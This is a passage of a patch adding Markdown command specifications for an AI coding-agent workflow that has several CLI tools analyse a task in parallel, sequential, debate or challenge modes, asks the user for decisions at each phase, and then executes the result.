||||
## Overview
|
||||
|
||||
**Complexity-aware workflow**: Clarify → Assess Complexity → Select Tools → Multi-Mode Analysis → Decision → Direct Execution
|
||||
|
||||
**vs multi-cli-plan**: No IMPL_PLAN.md, plan.json, synthesis.json - state in memory or lightweight scratchpad doc for complex tasks.
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```
|
||||
Phase 1: Clarify Requirements → AskUser for missing details
|
||||
Phase 1.5: Assess Complexity → Determine if planning doc needed
|
||||
Phase 2: Select Tools (CLI → Mode → Agent) → 3-step selection
|
||||
Phase 3: Multi-Mode Analysis → Execute with --resume chaining
|
||||
Phase 4: User Decision → Execute / Refine / Change / Cancel
|
||||
Phase 5: Direct Execution → No plan files (simple) or scratchpad doc (complex)
|
||||
```
|
||||
|
||||
## Phase 1: Clarify Requirements
|
||||
|
||||
```javascript
|
||||
const taskDescription = $ARGUMENTS
|
||||
|
||||
if (taskDescription.length < 20 || isAmbiguous(taskDescription)) {
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Please provide more details: target files/modules, expected behavior, constraints?",
|
||||
header: "Details",
|
||||
options: [
|
||||
{ label: "I'll provide more", description: "Add more context" },
|
||||
{ label: "Continue analysis", description: "Let tools explore autonomously" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
}
|
||||
|
||||
// Optional: Quick ACE Context for complex tasks
|
||||
mcp__ace-tool__search_context({
|
||||
project_root_path: process.cwd(),
|
||||
query: `${taskDescription} implementation patterns`
|
||||
})
|
||||
```
|
||||
|
||||
## Phase 1.5: Assess Complexity
|
||||
|
||||
| Level | Creates Plan Doc | Trigger Keywords |
|
||||
|-------|------------------|------------------|
|
||||
| **simple** | ❌ | (default) |
|
||||
| **moderate** | ✅ | module, system, service, integration, multiple |
|
||||
| **complex** | ✅ | refactor, migrate, security, auth, payment, database |
|
||||
|
||||
```javascript
|
||||
// Complexity detection (after ACE query)
|
||||
const isComplex = /refactor|migrate|security|auth|payment|database/i.test(taskDescription)
|
||||
const isModerate = /module|system|service|integration|multiple/i.test(taskDescription) || aceContext?.relevant_files?.length > 2
|
||||
|
||||
if (isComplex || isModerate) {
|
||||
const planPath = `.workflow/.scratchpad/lite3-${taskSlug}-${dateStr}.md`
|
||||
// Create planning doc with: Task, Status, Complexity, Analysis Summary, Execution Plan, Progress Log
|
||||
}
|
||||
```
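A minimal sketch of the planning-doc creation, assuming the sections named in the comment above (the exact template wording is up to the implementer):

```javascript
// Sketch: create the scratchpad planning doc for moderate/complex tasks
if (isComplex || isModerate) {
  Bash({ command: "mkdir -p .workflow/.scratchpad" })
  Write(planPath, [
    `# ${taskDescription}`,
    `Status: planning | Complexity: ${isComplex ? "complex" : "moderate"}`,
    "",
    "## Analysis Summary",
    "_(filled after Phase 3)_",
    "",
    "## Execution Plan",
    "_(filled after Phase 4)_",
    "",
    "## Progress Log",
    `- ${new Date().toISOString()}: created`
  ].join("\n"))
}
```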
|
||||
|
||||
## Phase 2: Select Tools
|
||||
|
||||
### Tool Definitions
|
||||
|
||||
**CLI Tools** (from cli-tools.json):
|
||||
```javascript
|
||||
const cliConfig = JSON.parse(Read("~/.claude/cli-tools.json"))
|
||||
const cliTools = Object.entries(cliConfig.tools)
|
||||
.filter(([_, config]) => config.enabled)
|
||||
.map(([name, config]) => ({
|
||||
name, type: 'cli',
|
||||
tags: config.tags || [],
|
||||
model: config.primaryModel,
|
||||
toolType: config.type // builtin, cli-wrapper, api-endpoint
|
||||
}))
|
||||
```
|
||||
|
||||
**Sub Agents**:
|
||||
|
||||
| Agent | Strengths | canExecute |
|
||||
|-------|-----------|------------|
|
||||
| **code-developer** | Code implementation, test writing | ✅ |
|
||||
| **Explore** | Fast code exploration, pattern discovery | ❌ |
|
||||
| **cli-explore-agent** | Dual-source analysis (Bash+CLI) | ❌ |
|
||||
| **cli-discuss-agent** | Multi-CLI collaboration, cross-verification | ❌ |
|
||||
| **debug-explore-agent** | Hypothesis-driven debugging | ❌ |
|
||||
| **context-search-agent** | Multi-layer file discovery, dependency analysis | ❌ |
|
||||
| **test-fix-agent** | Test execution, failure diagnosis, code fixing | ✅ |
|
||||
| **universal-executor** | General execution, multi-domain adaptation | ✅ |
|
||||
|
||||
**Analysis Modes**:
|
||||
|
||||
| Mode | Pattern | Use Case | minCLIs |
|
||||
|------|---------|----------|---------|
|
||||
| **Parallel** | `A \|\| B \|\| C → Aggregate` | Fast multi-perspective | 1+ |
|
||||
| **Sequential** | `A → B(resume) → C(resume)` | Incremental deepening | 2+ |
|
||||
| **Collaborative** | `A → B → A → B → Synthesize` | Multi-round refinement | 2+ |
|
||||
| **Debate** | `A(propose) → B(challenge) → A(defend)` | Adversarial validation | 2 |
|
||||
| **Challenge** | `A(analyze) → B(challenge)` | Find flaws and risks | 2 |
|
||||
|
||||
### Three-Step Selection Flow
|
||||
|
||||
```javascript
|
||||
// Step 1: Select CLIs (multiSelect)
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Select CLI tools for analysis (1-3 for collaboration modes)",
|
||||
header: "CLI Tools",
|
||||
options: cliTools.map(cli => ({
|
||||
label: cli.name,
|
||||
description: cli.tags.length > 0 ? cli.tags.join(', ') : cli.model || 'general'
|
||||
})),
|
||||
multiSelect: true
|
||||
}]
|
||||
})
|
||||
|
||||
// Step 2: Select Mode (filtered by CLI count)
|
||||
const availableModes = analysisModes.filter(m => selectedCLIs.length >= m.minCLIs)
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Select analysis mode",
|
||||
header: "Mode",
|
||||
options: availableModes.map(m => ({
|
||||
label: m.label,
|
||||
description: `${m.description} [${m.pattern}]`
|
||||
})),
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
|
||||
// Step 3: Select Agent for execution
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Select Sub Agent for execution",
|
||||
header: "Agent",
|
||||
options: agents.map(a => ({ label: a.name, description: a.strength })),
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
|
||||
// Confirm selection
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Confirm selection?",
|
||||
header: "Confirm",
|
||||
options: [
|
||||
{ label: "Confirm and continue", description: `${selectedMode.label} with ${selectedCLIs.length} CLIs` },
|
||||
{ label: "Re-select CLIs", description: "Choose different CLI tools" },
|
||||
{ label: "Re-select Mode", description: "Choose different analysis mode" },
|
||||
{ label: "Re-select Agent", description: "Choose different Sub Agent" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
## Phase 3: Multi-Mode Analysis
|
||||
|
||||
### Universal CLI Prompt Template
|
||||
|
||||
```javascript
|
||||
// Unified prompt builder - used by all modes
|
||||
function buildPrompt({ purpose, tasks, expected, rules, taskDescription }) {
|
||||
return `
|
||||
PURPOSE: ${purpose}: ${taskDescription}
|
||||
TASK: ${tasks.map(t => `• ${t}`).join(' ')}
|
||||
MODE: analysis
|
||||
CONTEXT: @**/*
|
||||
EXPECTED: ${expected}
|
||||
CONSTRAINTS: ${rules}
|
||||
`
|
||||
}
|
||||
|
||||
// Execute CLI with prompt
|
||||
function execCLI(cli, prompt, options = {}) {
|
||||
const { resume, background = false } = options
|
||||
const resumeFlag = resume ? `--resume ${resume}` : ''
|
||||
return Bash({
|
||||
command: `ccw cli -p "${prompt}" --tool ${cli.name} --mode analysis ${resumeFlag}`,
|
||||
run_in_background: background
|
||||
})
|
||||
}
|
||||
```
|
||||
|
||||
### Prompt Presets by Role
|
||||
|
||||
| Role | PURPOSE | TASKS | EXPECTED | RULES |
|
||||
|------|---------|-------|----------|-------|
|
||||
| **initial** | Initial analysis | Identify files, Analyze approach, List changes | Root cause, files, changes, risks | Focus on actionable insights |
|
||||
| **extend** | Build on previous | Review previous, Extend, Add insights | Extended analysis building on findings | Build incrementally, avoid repetition |
|
||||
| **synthesize** | Refine and synthesize | Review, Identify gaps, Synthesize | Refined synthesis with new perspectives | Add value not repetition |
|
||||
| **propose** | Propose comprehensive analysis | Analyze thoroughly, Propose solution, State assumptions | Well-reasoned proposal with trade-offs | Be clear about assumptions |
|
||||
| **challenge** | Challenge and stress-test | Identify weaknesses, Question assumptions, Suggest alternatives | Critique with counter-arguments | Be adversarial but constructive |
|
||||
| **defend** | Respond to challenges | Address challenges, Defend valid aspects, Propose refined solution | Refined proposal incorporating feedback | Be open to criticism, synthesize |
|
||||
| **criticize** | Find flaws ruthlessly | Find logical flaws, Identify edge cases, Rate criticisms | Critique with severity: [CRITICAL]/[HIGH]/[MEDIUM]/[LOW] | Be ruthlessly critical |
|
||||
|
||||
```javascript
|
||||
const PROMPTS = {
|
||||
initial: { purpose: 'Initial analysis', tasks: ['Identify affected files', 'Analyze implementation approach', 'List specific changes'], expected: 'Root cause, files to modify, key changes, risks', rules: 'Focus on actionable insights' },
|
||||
extend: { purpose: 'Build on previous analysis', tasks: ['Review previous findings', 'Extend analysis', 'Add new insights'], expected: 'Extended analysis building on previous', rules: 'Build incrementally, avoid repetition' },
|
||||
synthesize: { purpose: 'Refine and synthesize', tasks: ['Review previous', 'Identify gaps', 'Add insights', 'Synthesize findings'], expected: 'Refined synthesis with new perspectives', rules: 'Build collaboratively, add value' },
|
||||
propose: { purpose: 'Propose comprehensive analysis', tasks: ['Analyze thoroughly', 'Propose solution', 'State assumptions clearly'], expected: 'Well-reasoned proposal with trade-offs', rules: 'Be clear about assumptions' },
|
||||
challenge: { purpose: 'Challenge and stress-test', tasks: ['Identify weaknesses', 'Question assumptions', 'Suggest alternatives', 'Highlight overlooked risks'], expected: 'Constructive critique with counter-arguments', rules: 'Be adversarial but constructive' },
|
||||
defend: { purpose: 'Respond to challenges', tasks: ['Address each challenge', 'Defend valid aspects', 'Acknowledge valid criticisms', 'Propose refined solution'], expected: 'Refined proposal incorporating alternatives', rules: 'Be open to criticism, synthesize best ideas' },
|
||||
criticize: { purpose: 'Stress-test and find weaknesses', tasks: ['Find logical flaws', 'Identify missed edge cases', 'Propose alternatives', 'Rate criticisms (High/Medium/Low)'], expected: 'Detailed critique with severity ratings', rules: 'Be ruthlessly critical, find every flaw' }
|
||||
}
|
||||
```
|
||||
|
||||
### Mode Implementations
|
||||
|
||||
```javascript
|
||||
// Parallel: All CLIs run simultaneously
|
||||
async function executeParallel(clis, task) {
|
||||
return await Promise.all(clis.map(cli =>
|
||||
execCLI(cli, buildPrompt({ ...PROMPTS.initial, taskDescription: task }), { background: true })
|
||||
))
|
||||
}
|
||||
|
||||
// Sequential: Each CLI builds on previous via --resume
|
||||
async function executeSequential(clis, task) {
|
||||
const results = []
|
||||
let prevId = null
|
||||
for (const cli of clis) {
|
||||
const preset = prevId ? PROMPTS.extend : PROMPTS.initial
|
||||
const result = await execCLI(cli, buildPrompt({ ...preset, taskDescription: task }), { resume: prevId })
|
||||
results.push(result)
|
||||
prevId = extractSessionId(result)
|
||||
}
|
||||
return results
|
||||
}
|
||||
|
||||
// Collaborative: Multi-round synthesis
|
||||
async function executeCollaborative(clis, task, rounds = 2) {
|
||||
const results = []
|
||||
let prevId = null
|
||||
for (let r = 0; r < rounds; r++) {
|
||||
for (const cli of clis) {
|
||||
const preset = !prevId ? PROMPTS.initial : PROMPTS.synthesize
|
||||
const result = await execCLI(cli, buildPrompt({ ...preset, taskDescription: task }), { resume: prevId })
|
||||
results.push({ cli: cli.name, round: r, result })
|
||||
prevId = extractSessionId(result)
|
||||
}
|
||||
}
|
||||
return results
|
||||
}
|
||||
|
||||
// Debate: Propose → Challenge → Defend
|
||||
async function executeDebate(clis, task) {
|
||||
const [cliA, cliB] = clis
|
||||
const results = []
|
||||
|
||||
const propose = await execCLI(cliA, buildPrompt({ ...PROMPTS.propose, taskDescription: task }))
|
||||
results.push({ phase: 'propose', cli: cliA.name, result: propose })
|
||||
|
||||
const challenge = await execCLI(cliB, buildPrompt({ ...PROMPTS.challenge, taskDescription: task }), { resume: extractSessionId(propose) })
|
||||
results.push({ phase: 'challenge', cli: cliB.name, result: challenge })
|
||||
|
||||
const defend = await execCLI(cliA, buildPrompt({ ...PROMPTS.defend, taskDescription: task }), { resume: extractSessionId(challenge) })
|
||||
results.push({ phase: 'defend', cli: cliA.name, result: defend })
|
||||
|
||||
return results
|
||||
}
|
||||
|
||||
// Challenge: Analyze → Criticize
|
||||
async function executeChallenge(clis, task) {
|
||||
const [cliA, cliB] = clis
|
||||
const results = []
|
||||
|
||||
const analyze = await execCLI(cliA, buildPrompt({ ...PROMPTS.initial, taskDescription: task }))
|
||||
results.push({ phase: 'analyze', cli: cliA.name, result: analyze })
|
||||
|
||||
const criticize = await execCLI(cliB, buildPrompt({ ...PROMPTS.criticize, taskDescription: task }), { resume: extractSessionId(analyze) })
|
||||
results.push({ phase: 'challenge', cli: cliB.name, result: criticize })
|
||||
|
||||
return results
|
||||
}
|
||||
```
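`extractSessionId` is assumed by the mode implementations above but not defined here. A hedged sketch, assuming the CLI echoes an `ID: <session-id>` line in its output (as in other ccw execution examples); adjust the pattern to the actual output format:

```javascript
// Assumed helper: pull the session/execution ID out of CLI output for --resume chaining
function extractSessionId(result) {
  const match = String(result).match(/ID:\s*(\S+)/)
  return match ? match[1] : null
}
```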
|
||||
|
||||
### Mode Router & Result Aggregation
|
||||
|
||||
```javascript
|
||||
async function executeAnalysis(mode, clis, taskDescription) {
|
||||
switch (mode.name) {
|
||||
case 'parallel': return await executeParallel(clis, taskDescription)
|
||||
case 'sequential': return await executeSequential(clis, taskDescription)
|
||||
case 'collaborative': return await executeCollaborative(clis, taskDescription)
|
||||
case 'debate': return await executeDebate(clis, taskDescription)
|
||||
case 'challenge': return await executeChallenge(clis, taskDescription)
|
||||
}
|
||||
}
|
||||
|
||||
function aggregateResults(mode, results) {
|
||||
const base = { mode: mode.name, pattern: mode.pattern, tools_used: results.map(r => r.cli || 'unknown') }
|
||||
|
||||
switch (mode.name) {
|
||||
case 'parallel':
|
||||
return { ...base, findings: results.map(parseOutput), consensus: findCommonPoints(results), divergences: findDifferences(results) }
|
||||
case 'sequential':
|
||||
return { ...base, evolution: results.map((r, i) => ({ step: i + 1, analysis: parseOutput(r) })), finalAnalysis: parseOutput(results.at(-1)) }
|
||||
case 'collaborative':
|
||||
return { ...base, rounds: groupByRound(results), synthesis: extractSynthesis(results.at(-1)) }
|
||||
case 'debate':
|
||||
return { ...base, proposal: parseOutput(results.find(r => r.phase === 'propose')?.result),
|
||||
challenges: parseOutput(results.find(r => r.phase === 'challenge')?.result),
|
||||
resolution: parseOutput(results.find(r => r.phase === 'defend')?.result), confidence: calculateDebateConfidence(results) }
|
||||
case 'challenge':
|
||||
return { ...base, originalAnalysis: parseOutput(results.find(r => r.phase === 'analyze')?.result),
|
||||
critiques: parseCritiques(results.find(r => r.phase === 'challenge')?.result), riskScore: calculateRiskScore(results) }
|
||||
}
|
||||
}
|
||||
|
||||
// If planPath exists: update Analysis Summary & Execution Plan sections
|
||||
```
|
||||
|
||||
## Phase 4: User Decision
|
||||
|
||||
```javascript
|
||||
function presentSummary(analysis) {
|
||||
console.log(`## Analysis Result\n**Mode**: ${analysis.mode} (${analysis.pattern})\n**Tools**: ${analysis.tools_used.join(' → ')}`)
|
||||
|
||||
switch (analysis.mode) {
|
||||
case 'parallel':
|
||||
console.log(`### Consensus\n${analysis.consensus.map(c => `- ${c}`).join('\n')}\n### Divergences\n${analysis.divergences.map(d => `- ${d}`).join('\n')}`)
|
||||
break
|
||||
case 'sequential':
|
||||
console.log(`### Evolution\n${analysis.evolution.map(e => `**Step ${e.step}**: ${e.analysis.summary}`).join('\n')}\n### Final\n${analysis.finalAnalysis.summary}`)
|
||||
break
|
||||
case 'collaborative':
|
||||
console.log(`### Rounds\n${Object.entries(analysis.rounds).map(([r, a]) => `**Round ${r}**: ${a.map(x => x.cli).join(' + ')}`).join('\n')}\n### Synthesis\n${analysis.synthesis}`)
|
||||
break
|
||||
case 'debate':
|
||||
console.log(`### Debate\n**Proposal**: ${analysis.proposal.summary}\n**Challenges**: ${analysis.challenges.points?.length || 0} points\n**Resolution**: ${analysis.resolution.summary}\n**Confidence**: ${analysis.confidence}%`)
|
||||
break
|
||||
case 'challenge':
|
||||
console.log(`### Challenge\n**Original**: ${analysis.originalAnalysis.summary}\n**Critiques**: ${analysis.critiques.length} issues\n${analysis.critiques.map(c => `- [${c.severity}] ${c.description}`).join('\n')}\n**Risk Score**: ${analysis.riskScore}/100`)
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "How to proceed?",
|
||||
header: "Next Step",
|
||||
options: [
|
||||
{ label: "Execute directly", description: "Implement immediately" },
|
||||
{ label: "Refine analysis", description: "Add constraints, re-analyze" },
|
||||
{ label: "Change tools", description: "Different tool combination" },
|
||||
{ label: "Cancel", description: "End workflow" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
// If planPath exists: record decision to Decisions Made table
|
||||
// Routing: Execute → Phase 5 | Refine → Phase 3 | Change → Phase 2 | Cancel → End
|
||||
```
|
||||
|
||||
## Phase 5: Direct Execution
|
||||
|
||||
```javascript
|
||||
// Simple tasks: No artifacts | Complex tasks: Update scratchpad doc
|
||||
const executionAgents = agents.filter(a => a.canExecute)
|
||||
const executionTool = selectedAgent.canExecute ? selectedAgent : selectedCLIs[0]
|
||||
|
||||
if (executionTool.type === 'agent') {
|
||||
Task({
|
||||
subagent_type: executionTool.name,
|
||||
run_in_background: false,
|
||||
description: `Execute: ${taskDescription.slice(0, 30)}`,
|
||||
prompt: `## Task\n${taskDescription}\n\n## Analysis Results\n${JSON.stringify(aggregatedAnalysis, null, 2)}\n\n## Instructions\n1. Apply changes to identified files\n2. Follow recommended approach\n3. Handle identified risks\n4. Verify changes work correctly`
|
||||
})
|
||||
} else {
|
||||
Bash({
|
||||
command: `ccw cli -p "
|
||||
PURPOSE: Implement solution: ${taskDescription}
|
||||
TASK: ${extractedTasks.join(' • ')}
|
||||
MODE: write
|
||||
CONTEXT: @${affectedFiles.join(' @')}
|
||||
EXPECTED: Working implementation with all changes applied
|
||||
CONSTRAINTS: Follow existing patterns
|
||||
" --tool ${executionTool.name} --mode write`,
|
||||
run_in_background: false
|
||||
})
|
||||
}
|
||||
// If planPath exists: update Status to completed/failed, append to Progress Log
|
||||
```
|
||||
|
||||
## TodoWrite Structure
|
||||
|
||||
```javascript
|
||||
TodoWrite({ todos: [
|
||||
{ content: "Phase 1: Clarify requirements", status: "in_progress", activeForm: "Clarifying requirements" },
|
||||
{ content: "Phase 1.5: Assess complexity", status: "pending", activeForm: "Assessing complexity" },
|
||||
{ content: "Phase 2: Select tools", status: "pending", activeForm: "Selecting tools" },
|
||||
{ content: "Phase 3: Multi-mode analysis", status: "pending", activeForm: "Running analysis" },
|
||||
{ content: "Phase 4: User decision", status: "pending", activeForm: "Awaiting decision" },
|
||||
{ content: "Phase 5: Direct execution", status: "pending", activeForm: "Executing" }
|
||||
]})
|
||||
```
|
||||
|
||||
## Iteration Patterns
|
||||
|
||||
| Pattern | Flow |
|
||||
|---------|------|
|
||||
| **Direct** | Phase 1 → 2 → 3 → 4(execute) → 5 |
|
||||
| **Refinement** | Phase 3 → 4(refine) → 3 → 4 → 5 |
|
||||
| **Tool Adjust** | Phase 2(adjust) → 3 → 4 → 5 |
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error | Resolution |
|
||||
|-------|------------|
|
||||
| CLI timeout | Retry with secondary model |
|
||||
| No enabled tools | Ask user to enable tools in cli-tools.json |
|
||||
| Task unclear | Default to first CLI + code-developer |
|
||||
| Ambiguous task | Force clarification via AskUser |
|
||||
| Execution fails | Present error, ask user for direction |
|
||||
| Plan doc write fails | Continue without doc (degrade to zero-artifact mode) |
|
||||
| Scratchpad dir missing | Auto-create `.workflow/.scratchpad/` |
|
||||
|
||||
## Comparison with multi-cli-plan
|
||||
|
||||
| Aspect | lite-lite-lite | multi-cli-plan |
|
||||
|--------|----------------|----------------|
|
||||
| **Artifacts** | Conditional (scratchpad doc for complex tasks) | Always (IMPL_PLAN.md, plan.json, synthesis.json) |
|
||||
| **Session** | Stateless (--resume chaining) | Persistent session folder |
|
||||
| **Tool Selection** | 3-step (CLI → Mode → Agent) | Config-driven fixed tools |
|
||||
| **Analysis Modes** | 5 modes with --resume | Fixed synthesis rounds |
|
||||
| **Complexity** | Auto-detected (simple/moderate/complex) | Assumed complex |
|
||||
| **Best For** | Quick analysis, simple-to-moderate tasks | Complex multi-step implementations |
|
||||
|
||||
## Post-Completion Expansion
|
||||
|
||||
After completion, ask the user whether to expand the work into follow-up issues (test/enhance/refactor/doc); for each selected dimension, call `/issue:new "{summary} - {dimension}"`.
|
||||
|
||||
## Related Commands
|
||||
|
||||
```bash
|
||||
/workflow:multi-cli-plan "complex task" # Full planning workflow
|
||||
/workflow:lite-plan "task" # Single CLI planning
|
||||
/workflow:lite-execute --in-memory # Direct execution
|
||||
```
|
||||
@@ -497,6 +497,7 @@ ${plan.tasks.map((t, i) => `${i+1}. ${t.title} (${t.file})`).join('\n')}
|
||||
|
||||
**Step 4.2: Collect Confirmation**
|
||||
```javascript
|
||||
// Note: Execution "Other" option allows specifying CLI tools from ~/.claude/cli-tools.json
|
||||
AskUserQuestion({
|
||||
questions: [
|
||||
{
|
||||
@@ -524,8 +525,9 @@ AskUserQuestion({
|
||||
header: "Review",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Gemini Review", description: "Gemini CLI" },
|
||||
{ label: "Agent Review", description: "@code-reviewer" },
|
||||
{ label: "Gemini Review", description: "Gemini CLI review" },
|
||||
{ label: "Codex Review", description: "Git-aware review (prompt OR --uncommitted)" },
|
||||
{ label: "Agent Review", description: "@code-reviewer agent" },
|
||||
{ label: "Skip", description: "No review" }
|
||||
]
|
||||
}
|
||||
|
||||
.claude/commands/workflow/multi-cli-plan.md (new file, 568 lines)
@@ -0,0 +1,568 @@
|
||||
---
|
||||
name: workflow:multi-cli-plan
|
||||
description: Multi-CLI collaborative planning workflow with ACE context gathering and iterative cross-verification. Uses cli-discuss-agent for Gemini+Codex+Claude analysis to converge on optimal execution plan.
|
||||
argument-hint: "<task description> [--max-rounds=3] [--tools=gemini,codex] [--mode=parallel|serial]"
|
||||
allowed-tools: TodoWrite(*), Task(*), AskUserQuestion(*), Read(*), Bash(*), Write(*), mcp__ace-tool__search_context(*)
|
||||
---
|
||||
|
||||
# Multi-CLI Collaborative Planning Command
|
||||
|
||||
## Quick Start
|
||||
|
||||
```bash
|
||||
# Basic usage
|
||||
/workflow:multi-cli-plan "Implement user authentication"
|
||||
|
||||
# With options
|
||||
/workflow:multi-cli-plan "Add dark mode support" --max-rounds=3
|
||||
/workflow:multi-cli-plan "Refactor payment module" --tools=gemini,codex,claude
|
||||
/workflow:multi-cli-plan "Fix memory leak" --mode=serial
|
||||
```
|
||||
|
||||
**Context Source**: ACE semantic search + Multi-CLI analysis
|
||||
**Output Directory**: `.workflow/.multi-cli-plan/{session-id}/`
|
||||
**Default Max Rounds**: 3 (convergence may complete earlier)
|
||||
**CLI Tools**: @cli-discuss-agent (analysis), @cli-lite-planning-agent (plan generation)
|
||||
**Execution**: Auto-hands off to `/workflow:lite-execute --in-memory` after plan approval
|
||||
|
||||
## What & Why
|
||||
|
||||
### Core Concept
|
||||
|
||||
Multi-CLI collaborative planning with **three-phase architecture**: ACE context gathering → Iterative multi-CLI discussion → Plan generation. Orchestrator delegates analysis to agents, only handles user decisions and session management.
|
||||
|
||||
**Process**:
|
||||
- **Phase 1**: ACE semantic search gathers codebase context
|
||||
- **Phase 2**: cli-discuss-agent orchestrates Gemini/Codex/Claude for cross-verified analysis
|
||||
- **Phase 3-5**: User decision → Plan generation → Execution handoff
|
||||
|
||||
**vs Single-CLI Planning**:
|
||||
- **Single**: One model perspective, potential blind spots
|
||||
- **Multi-CLI**: Cross-verification catches inconsistencies, builds consensus on solutions
|
||||
|
||||
### Value Proposition
|
||||
|
||||
1. **Multi-Perspective Analysis**: Gemini + Codex + Claude analyze from different angles
|
||||
2. **Cross-Verification**: Identify agreements/disagreements, build confidence
|
||||
3. **User-Driven Decisions**: Every round ends with user decision point
|
||||
4. **Iterative Convergence**: Progressive refinement until consensus reached
|
||||
|
||||
### Orchestrator Boundary (CRITICAL)
|
||||
|
||||
- **ONLY command** for multi-CLI collaborative planning
|
||||
- Manages: Session state, user decisions, agent delegation, phase transitions
|
||||
- Delegates: CLI execution to @cli-discuss-agent, plan generation to @cli-lite-planning-agent
|
||||
|
||||
### Execution Flow
|
||||
|
||||
```
|
||||
Phase 1: Context Gathering
|
||||
└─ ACE semantic search, extract keywords, build context package
|
||||
|
||||
Phase 2: Multi-CLI Discussion (Iterative, via @cli-discuss-agent)
|
||||
├─ Round N: Agent executes Gemini + Codex + Claude
|
||||
├─ Cross-verify findings, synthesize solutions
|
||||
├─ Write synthesis.json to rounds/{N}/
|
||||
└─ Loop until convergence or max rounds
|
||||
|
||||
Phase 3: Present Options
|
||||
└─ Display solutions with trade-offs from agent output
|
||||
|
||||
Phase 4: User Decision
|
||||
├─ Select solution approach
|
||||
├─ Select execution method (Agent/Codex/Auto)
|
||||
├─ Select code review tool (Skip/Gemini/Codex/Agent)
|
||||
└─ Route:
|
||||
├─ Approve → Phase 5
|
||||
├─ Need More Analysis → Return to Phase 2
|
||||
└─ Cancel → Save session
|
||||
|
||||
Phase 5: Plan Generation & Execution Handoff
|
||||
├─ Generate plan.json (via @cli-lite-planning-agent)
|
||||
├─ Build executionContext with user selections
|
||||
  └─ Hand off to /workflow:lite-execute --in-memory
|
||||
```
|
||||
|
||||
### Agent Roles
|
||||
|
||||
| Agent | Responsibility |
|
||||
|-------|---------------|
|
||||
| **Orchestrator** | Session management, ACE context, user decisions, phase transitions, executionContext assembly |
|
||||
| **@cli-discuss-agent** | Multi-CLI execution (Gemini/Codex/Claude), cross-verification, solution synthesis, synthesis.json output |
|
||||
| **@cli-lite-planning-agent** | Task decomposition, plan.json generation following schema |
|
||||
|
||||
## Core Responsibilities
|
||||
|
||||
### Phase 1: Context Gathering
|
||||
|
||||
**Session Initialization**:
|
||||
```javascript
|
||||
const sessionId = `MCP-${taskSlug}-${date}`
|
||||
const sessionFolder = `.workflow/.multi-cli-plan/${sessionId}`
|
||||
Bash(`mkdir -p ${sessionFolder}/rounds`)
|
||||
```
|
||||
|
||||
**ACE Context Queries**:
|
||||
```javascript
|
||||
const aceQueries = [
|
||||
`Project architecture related to ${keywords}`,
|
||||
`Existing implementations of ${keywords[0]}`,
|
||||
`Code patterns for ${keywords} features`,
|
||||
`Integration points for ${keywords[0]}`
|
||||
]
|
||||
// Execute via mcp__ace-tool__search_context
|
||||
```
|
||||
|
||||
**Context Package** (passed to agent):
|
||||
- `relevant_files[]` - Files identified by ACE
|
||||
- `detected_patterns[]` - Code patterns found
|
||||
- `architecture_insights` - Structure understanding
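Illustratively, the package handed to the agent might look like the following (field names are from the list above; the values are hypothetical):

```javascript
// Hypothetical example of the ACE context package passed to cli-discuss-agent
const contextPackage = {
  relevant_files: ["src/payment/processor.ts", "src/types/payment.ts"],
  detected_patterns: ["factory pattern in src/lib", "Stripe SDK wrapper"],
  architecture_insights: "Layered service architecture; payment logic isolated under src/payment"
}
```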
|
||||
|
||||
### Phase 2: Agent Delegation
|
||||
|
||||
**Core Principle**: Orchestrator only delegates and reads output - NO direct CLI execution.
|
||||
|
||||
**Agent Invocation**:
|
||||
```javascript
|
||||
Task({
|
||||
subagent_type: "cli-discuss-agent",
|
||||
run_in_background: false,
|
||||
description: `Discussion round ${currentRound}`,
|
||||
prompt: `
|
||||
## Input Context
|
||||
- task_description: ${taskDescription}
|
||||
- round_number: ${currentRound}
|
||||
- session: { id: "${sessionId}", folder: "${sessionFolder}" }
|
||||
- ace_context: ${JSON.stringify(contextPackage)}
|
||||
- previous_rounds: ${JSON.stringify(analysisResults)}
|
||||
- user_feedback: ${userFeedback || 'None'}
|
||||
- cli_config: { tools: ["gemini", "codex"], mode: "parallel", fallback_chain: ["gemini", "codex", "claude"] }
|
||||
|
||||
## Execution Process
|
||||
1. Parse input context (handle JSON strings)
|
||||
2. Check if ACE supplementary search needed
|
||||
3. Build CLI prompts with context
|
||||
4. Execute CLIs (parallel or serial per cli_config.mode)
|
||||
5. Parse CLI outputs, handle failures with fallback
|
||||
6. Perform cross-verification between CLI results
|
||||
7. Synthesize solutions, calculate scores
|
||||
8. Calculate convergence, generate clarification questions
|
||||
9. Write synthesis.json
|
||||
|
||||
## Output
|
||||
Write: ${sessionFolder}/rounds/${currentRound}/synthesis.json
|
||||
|
||||
## Completion Checklist
|
||||
- [ ] All configured CLI tools executed (or fallback triggered)
|
||||
- [ ] Cross-verification completed with agreements/disagreements
|
||||
- [ ] 2-3 solutions generated with file:line references
|
||||
- [ ] Convergence score calculated (0.0-1.0)
|
||||
- [ ] synthesis.json written with all Primary Fields
|
||||
`
|
||||
})
|
||||
```
|
||||
|
||||
**Read Agent Output**:
|
||||
```javascript
|
||||
const synthesis = JSON.parse(Read(`${sessionFolder}/rounds/${round}/synthesis.json`))
|
||||
// Access top-level fields: solutions, convergence, cross_verification, clarification_questions
|
||||
```
|
||||
|
||||
**Convergence Decision**:
|
||||
```javascript
|
||||
if (synthesis.convergence.recommendation === 'converged') {
|
||||
// Proceed to Phase 3
|
||||
} else if (synthesis.convergence.recommendation === 'user_input_needed') {
|
||||
// Collect user feedback, return to Phase 2
|
||||
} else {
|
||||
// Continue to next round if new_insights && round < maxRounds
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 3: Present Options
|
||||
|
||||
**Display from Agent Output** (no processing):
|
||||
```javascript
|
||||
